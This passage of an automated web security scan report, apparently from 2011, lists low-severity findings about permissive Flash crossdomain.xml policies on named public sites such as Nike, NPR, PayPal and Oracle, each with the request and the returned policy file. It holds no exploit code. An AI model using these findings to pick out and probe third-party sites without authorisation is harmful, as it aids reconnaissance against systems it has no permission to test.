Last-Modified: Sat, 20 Nov 2010 14:30:34 GMT
Accept-Ranges: bytes
Content-Length: 773
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:19:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="nhl.com" />
<allow-access-from domain="*.nhl.com" />
<allow-access-from domain="nhl.cdn.neulion.net" />
<allow-access-from domain="smb.cdn.neulion.com" />
<allow-access-from domain="neulion.vo.llnwd.net" />
<allow-access-from domain="neulion.hs.llnwd.net" />
<allow-access-from domain="*.cdnl3.neulion.com" />
<allow-access-from domain="secure.footprint.net" />
<allow-access-from domain="localhost" />
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.hersheycanada.com"/>
<allow-access-from domain="*.draftfcbdigital.com"/>
...[SNIP]...

7.366. http://www.nike.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nike.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nike.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 08 Dec 2010 19:51:18 GMT
ETag: "112f-496eb71d35980"
Content-Type: application/xml
Cache-Control: max-age=10116
Expires: Sat, 02 Apr 2011 16:33:15 GMT
Date: Sat, 02 Apr 2011 13:44:39 GMT
Content-Length: 4399
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="nikeid.nike.com" secure="false" />
<allow-access-from domain="env1-brand.nike.com" secure="false"/>
<allow-access-from domain="env2-nikeid.nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nikewomen.nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nikeid-europe.nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nike.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.dyestat.com"/>
<allow-access-from domain="dyestat.com"/>
<allow-access-from domain="*.nikeacg.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nike.com.au" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nike.co.nz" secure="false" />
...[SNIP]...
<allow-access-from domain="*.niketown.nike.com" secure="false" />
...[SNIP]...
<allow-access-from domain="au.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="advision.webevents.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="nike.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nike.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="*.growingroster.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redcated" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="nikerunning.nike.com" secure="false" />
...[SNIP]...
<allow-access-from domain="nikeplus.nike.com" secure="false" />
...[SNIP]...
<allow-access-from domain="web.splashcast.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.immersivemedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.imc.cachefly.net" secure="false" />
...[SNIP]...
<allow-access-from domain="nike-dev2.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-dev3.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-dev4.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-dev5.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-dev6.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="gigyahosting1.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.gigya.s3.amazonaws.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="msnbanner.arcww.it" secure="false" />
...[SNIP]...
<allow-access-from domain="www.sportchalet.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="sportchalet.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.jdsports.co.uk"/>
<allow-access-from domain="cdn.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nv.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.beta01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nv.beta01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.beta01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.content01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nv.content01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.content01.nimblefish.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.schuelervz.net"/>
<allow-access-from domain="*.studivz.net"/>
<allow-access-from domain="*.meinvz.net"/>
<allow-access-from domain="gigya.s3.amazonaws.com"/>
   <allow-access-from domain="gigyahosting1.com"/>
   <allow-access-from domain="admin.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="s101573.gridserver.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="nike-prox-ecn18.ny.rga.com"/>
   <allow-access-from domain="nike-prox-ecn10.ny.rga.com"/>
   <allow-access-from domain="nikedev.blastradius.com" secure="false" />
...[SNIP]...
<allow-access-from domain="nike-qa.blastradius.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kobe.nike.jess3.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.facebook.com" secure="false"/>
...[SNIP]...

7.367. http://www.npr.org/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:59 GMT
Server: Apache/2.2.14 (Unix)
Last-Modified: Mon, 02 Nov 2009 20:35:41 GMT
Accept-Ranges: bytes
Content-Length: 355
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 13:53:59 GMT
Keep-Alive: timeout=10, max=4978
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.threespot.com"/>
   <allow-access-from domain="*.npr.org" />
   <allow-access-from domain="*.digitaria.com"/>
   <allow-access-from domain="www.kqed.org" />
...[SNIP]...

7.368. http://www.nwsource.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nwsource.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nwsource.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 12 May 2009 17:33:00 GMT
ETag: "3ee92-154-7c794b00"
Accept-Ranges: bytes
Content-Length: 340
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:34:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:34:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="local.ads.nwsource.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...

7.369. http://www.nypost.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nypost.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 13 May 2010 18:51:22 GMT
ETag: "c38038-a4-4867e3ea75e80"
Accept-Ranges: bytes
Content-Length: 164
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:38:59 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.nypost.com" />
<allow-access-from domain="*.doubleclick.net" />
</cross-domain-policy>

7.370. http://www.nytimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 12:43:14 GMT
Content-length: 1169
Content-type: text/xml
Set-cookie: RMID=3280aa5b17b64d9719e26d8a; expires=Sunday, 01-Apr-2012 12:43:14 GMT; path=/; domain=.nytimes.com
Last-modified: Wed, 21 Jul 2010 15:01:34 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

7.371. http://www.opentable.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opentable.com

Response

HTTP/1.1 200 OK
Content-Length: 428
Content-Type: text/xml
Last-Modified: Tue, 15 Mar 2011 18:49:20 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Sat, 02 Apr 2011 13:45:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.eyewonder.com" />
<allow-access-from domain="eyewonder.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="eyewonderlabs.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...

7.372. http://www.opera.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.opera.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opera.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:17 GMT
Server: Apache
Last-Modified: Tue, 03 Aug 2010 10:18:41 GMT
ETag: "30002974-127-48ce8a4248240"
Accept-Ranges: bytes
Content-Type: text/xml; charset=utf-8
Content-Length: 142
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*.opera.com" secure="true"/>
</cross-domain-policy>

7.373. http://www.opinionshere.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.opinionshere.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opinionshere.com

Response

HTTP/1.1 200 OK
Set-Cookie: opinions_here=a500242$50$0$6$140b0403$1021b38; Version=1; path=/; expires=Sun, 3-Apr-2011 2:27:56 GMT
Content-Type: text/xml
Last-Modified: Mon, 29 Nov 2010 15:24:56 GMT
Accept-Ranges: bytes
ETag: "dfbc2094d98fcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:01:35 GMT
Connection: close
Content-Length: 696

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.otxresearch.com" />
   
<allow-access-from domain="*.vo-id.com" />

<allow-access-from domain="*.surveymatch.com" />
   
<allow-access-from domain="*.rsxportal.com" />
...[SNIP]...
<allow-access-from domain="*.opinionshere.com" />
...[SNIP]...

7.374. http://www.oprah.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oprah.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oprah.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://www.oprah.com/w3c/p3p.xml", CP="CAO DSP ADM DEV PSD OUR IND NAV UNI"
Cteonnt-Length: 356
Content-Type: text/xml
Cache-Control: max-age=900
Date: Sat, 02 Apr 2011 13:35:56 GMT
Content-Length: 356
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.oprah.com
Set-Cookie: check_loc=US; expires=Sun, 03-Apr-2011 13:35:56 GMT; path=/

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.oprah.com" secure="false" />
   <allow-access-from domain="*.harpo.com" secure="false" />
<allow-http-request-headers-from dom
...[SNIP]...

7.375. http://www.oracle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Last-Modified: Sun, 13 Mar 2011 22:39:04 GMT
ETag: "4e01a6-2f2-49e64dcbaf200"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=85111872234949666,0)
Date: Sat, 02 Apr 2011 13:40:06 GMT
Content-Length: 754
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com" />
<allow-access-from domain="oracle.com"/>
...[SNIP]...
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
...[SNIP]...

7.376. http://www.ourstage.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ourstage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ourstage.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: haproxy
Last-Modified: Fri, 03 Jul 2009 01:23:45 GMT
ETag: "10255-114-46dc301e9ea40"
Accept-Ranges: bytes
Content-Length: 276
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ourstage.com" />
   <site-con
...[SNIP]...

7.377. http://www.overstock.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.overstock.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:29 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT
Accept-Ranges: bytes
Content-Length: 230
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy
X-Pad: avoid browser bug

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="by-content-type"/>
<allow-access-from domain="*.overstock.com"/>
<allow-access-from domain="*.ostkcdn.com"/>
...[SNIP]...

7.378. http://www.pandora.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pandora.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pandora.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:06 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 22:14:31 GMT
ETag: "127-49fa66264bfc0"
Accept-Ranges: bytes
Content-Length: 295
Cache-Control: max-age=-224615
Expires: Wed, 30 Mar 2011 22:14:31 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=65
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.pandora.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mediapromoter.net" secure="false"/>
...[SNIP]...

7.379. http://www.parentsconnect.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.parentsconnect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.parentsconnect.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 30 Nov 2010 17:54:05 GMT
ETag: "4ad4016-1d7-49648dfe54940"
Accept-Ranges: bytes
Content-Length: 471
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:36:38 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
       <allow-access-from domain="*.mtvi.com"/>
       <allow-access-from domain="*.peanut-d.mtvi.com"/>
       <allow-access-from domain="*.peanut-q.mtvi.com"/>
       <allow-access-from domain="*.parentsconnect.com"/>
       <allow-access-from domain="*.mtvnservices.com"/>
       <allow-access-from domain="viacom.fcod.llnwd.net"/>
...[SNIP]...

7.380. http://www.partypoker.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.partypoker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.partypoker.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 16 Feb 2011 17:55:42 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 03:05:43 GMT
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1) gen true for "http://tracker.partypoker.com" r (nz 1 vz 1 lz 1 od 1 cz 1))
Keep-Alive: timeout=5, max=91
Content-Type: text/xml
Connection: Keep-Alive
Date: Sat, 02 Apr 2011 03:05:43 GMT
Age: 0
Content-Length: 440

<cross-domain-policy>
   <allow-access-from domain="www.partypoker.com" secure="true"/>
   <allow-access-from domain="videos.partypoker.com" secure="true"/>
   <allow-access-from domain="*rss.partypoker.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.partypoker.com" secure="true"/>
   <allow-access-from domain="en-new-partypoker.dev" secure="true"/>
   <allow-access-from domain="maxymiser.hs.llnwd.net/*" secure="true"/>
...[SNIP]...

7.381. http://www.paypal.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paypal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paypal.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:37:42 GMT
Server: Apache
Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT
Accept-Ranges: bytes
Content-Length: 312
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.ebay.com" />
<allow-access-from domain="*.paypalobjects.com" />
...[SNIP]...

7.382. http://www.pbs.org/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pbs.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pbs.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:25 GMT
Server: Apache/2.2.17 (Unix)
Set-Cookie: www.apache.sid=1860a232d224230ba77e2f75eccad67e; path=/; domain=.pbs.org
Accept-Ranges: bytes
Content-Length: 1204
Connection: close
Content-Type: text/xml
X-Pad: avoid browser bug

<cross-domain-policy>
<allow-access-from domain="*.pbs.org"/>
<allow-access-from domain="*.pbskids.org"/>
<allow-access-from domain="www-tc.pbs.org"/>
<allow-access-from domain="www.pb
...[SNIP]...
<allow-access-from domain="pbskids.org"/>
<allow-access-from domain="www-tc.pbskids.org"/>
<allow-access-from domain="wrpx.service.mirror-image.net"/>
...[SNIP]...
<allow-access-from domain="*.tribalnova.com"/>
<allow-access-from domain="*.pbskidsplay.org"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="dipsy.pbs.org"/>
<allow-access-from domain="*.chumby.com"/>
<allow-access-from domain="209.98.43.18"/>
<allow-access-from domain="174.129.32.152"/>
<allow-access-from domain="widgets.pbs.org"/>
...[SNIP]...
<allow-access-from domain="174.129.43.74"/>
<allow-access-from domain="ec2-184-73-243-168.compute-1.amazonaws.com"/>
...[SNIP]...
<allow-access-from domain="*.comcastcim.edgesuite.net" />
<allow-access-from domain="*edgesuite.net" />
...[SNIP]...

7.383. http://www.pch.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pch.com

Response

HTTP/1.1 200 OK
Content-Length: 462
Content-Type: text/xml
Last-Modified: Fri, 04 Jun 2010 19:30:08 GMT
Accept-Ranges: bytes
ETag: "a5bd4d571c4cb1:900"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:30 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
